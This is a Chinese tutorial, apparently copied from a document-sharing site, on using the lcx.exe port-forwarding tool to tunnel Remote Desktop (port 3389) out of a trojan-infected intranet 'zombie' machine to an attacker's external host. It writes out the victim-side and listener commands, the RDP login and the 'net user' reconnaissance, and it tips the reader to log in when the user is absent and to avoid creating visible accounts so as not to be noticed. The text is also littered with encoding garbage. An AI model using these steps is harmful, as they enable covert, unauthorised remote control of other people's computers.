資源描述:
《LCX轉(zhuǎn)發(fā)內(nèi)網(wǎng)端口》由會員上傳分享�,免費在線閱讀����,更多相關(guān)內(nèi)容在教育資源-天天文庫��。
1��、在理論上只要網(wǎng)絡(luò)連接的計算機都是可以訪問的���,但是在實際中往往由于技術(shù)水平等原因,很難實現(xiàn)它;例如局域網(wǎng)中的某臺計算機僅僅開放了Web服務(wù)�����,該服務(wù)僅能供內(nèi)網(wǎng)用戶使用�����,而外網(wǎng)用戶根本沒有辦法直接訪問�。因此要想讓外網(wǎng)用戶能夠訪問局域網(wǎng)中的系統(tǒng)服務(wù)���,這必須進行端口映射等操作才行���。端口映射在入侵內(nèi)網(wǎng)的時候經(jīng)常用到,特別是要登陸遠程終端服務(wù)時��,使用端口映射就非常方便?��! cx.exe是一個端口轉(zhuǎn)發(fā)工具�,相當于把肉雞A上的3389端口轉(zhuǎn)發(fā)到具有外網(wǎng)IP地址的B機上�����,這樣連接B機的3389端口就相當于鏈接A機的3389端口���。Lcx程序多用于被控制計算機(
2�����、肉雞)處于內(nèi)網(wǎng)的情況��,被控制機可能中了木馬程序�����,雖然能夠進行控制�,但還是沒有使用遠程終端登陸到本機進行管理方便���,因此在很多情況下����,都會想方設(shè)法在被控制計算機上開啟3389端口,然后通過lcx等程序進行端口轉(zhuǎn)發(fā)�����,進而在本地連接到被控制計算機的遠程終端并進行管理和使用�。 1確定被控制計算機的IP地址 在被控制計算機上開啟遠程終端�����,然后執(zhí)行“ipconfig/all”命令���,查看其網(wǎng)絡(luò)配置情況,如圖1所示�����,該計算機的ip地址為“192.168.80.129” 圖1確定被控制計算機的IP地址 2在被控制計算機上執(zhí)行端口轉(zhuǎn)發(fā)命令 在被控制
3��、計算機上執(zhí)行“l(fā)cx–slave218.69.*.*51192.168.80.1293389”���,如圖2所示�,執(zhí)行完畢后會給出一些提示,如果顯示為“MakeaConnectionto218.69.*.*:51”則表示端口轉(zhuǎn)發(fā)正確�。 圖2在被控制計算機上執(zhí)行轉(zhuǎn)發(fā)命令 說明 lcx一共有三條命令�,第一條命令(lcx–lister513389)是在具有外網(wǎng)獨立IP的計算機上執(zhí)行,表示在本機上監(jiān)聽51端口���,該端口主要是接受被控制計算機3389端口轉(zhuǎn)發(fā)過來的數(shù)據(jù)�。第二條命令(lcx–slave218.69.*.*51192.168.80.12
4�����、93389)表示將本機IP地址為192.168.80.129的3389端口轉(zhuǎn)發(fā)到遠程地址為“218.69.*.*”的51端口���。第三條命令是端口轉(zhuǎn)向�?����! ?在本機上執(zhí)行監(jiān)聽命令 在本機上打開DOS命令提示符�����,然后到lcx.exe程序所在路徑執(zhí)行“l(fā)cx–lister513389”命令,監(jiān)聽51端口����,監(jiān)聽成功后,會顯示如圖3所示的數(shù)據(jù)�。 圖3在本機上監(jiān)聽51端口 注意 (1)在本機上監(jiān)聽的端口必須是未使用的端口��,可以使用“netstat-an
5��、find"51"”命令進行查看�����,如果沒有顯示結(jié)果則表示51端口可以用來進行監(jiān)聽���?����! ?2)
6、被控制計算機與本機成功建立連接后會不停的顯示連接數(shù)據(jù)���,如圖4所示�����,如果未出現(xiàn)數(shù)據(jù)發(fā)送和接受的情況���,說明連接建立不成功�?����! D4成功建立連接 4在本機使用遠程終端進行登錄 在DOS提示符下輸入“mstsc”命令打開遠程終端連接器�����,輸入“127.0.0.1”后單擊“連接”按鈕進行遠程終端連接�,在出現(xiàn)登錄界面后分別收入用戶名和密碼,驗證通過后����,即可遠程進入被控制計算機的桌面,如圖5所示���,輸入“ipconfig/all”以及“netuser”命令來查看網(wǎng)絡(luò)配置情況以及用戶信息���?! D5遠程登入被控制計算機 注意 (1)如果被控制計算
7����、機是服務(wù)器,則在登陸時可以直接進行登陸;如果被控制計算機是WindowsXP系統(tǒng)��,則最好選擇用戶不在計算機的時間進行登陸��,否則容易被發(fā)現(xiàn)�����?�! ?2)不要輕易在被控制計算機上建立賬號���,尤其是WindowsXP�����,建立帳號后����,會立即在登陸界面中進行顯示�。 5查看本地連接 在被控制計算機上使用“netstat-an”查看當前所有的連接時����,可以看到被控制計算機時在跟自己進行遠程終端連接,如圖6所示��,而實際的3389端口是跟本機的51端口進行連接的�����?! D6查看實際網(wǎng)絡(luò)連接 本案例通過使用lcx端口轉(zhuǎn)發(fā)程序,成功的在本機連入被控制計算機的內(nèi)網(wǎng)
8����、,可以很方便的對該計算機進行遠程管理���,在進行內(nèi)網(wǎng)滲透時尤為有用
